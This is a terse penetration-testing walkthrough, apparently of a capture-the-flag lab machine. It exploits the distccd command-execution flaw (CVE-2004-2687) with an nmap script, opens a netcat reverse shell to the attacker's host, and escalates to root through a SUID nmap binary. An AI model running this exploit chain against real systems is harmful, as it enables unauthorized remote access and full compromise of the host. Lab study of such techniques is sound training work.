3 :3632 distccd
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
$ nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='whoami;id'" -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-26 16:45 PDT
Nmap scan report for 10.10.10.3
Host is up (0.071s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-exec:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| daemon
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
| https://distcc.github.io/security.html
|_ https://nvd.nist.gov/vuln/detail/CVE-2004-2687
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
$ nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc 10.10.14.2 6969 -e /bin/sh'" -Pn
whoami
daemon
find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls
344956 768 -rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
nmap --interactive
!sh
whoami;id
root
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
Last updated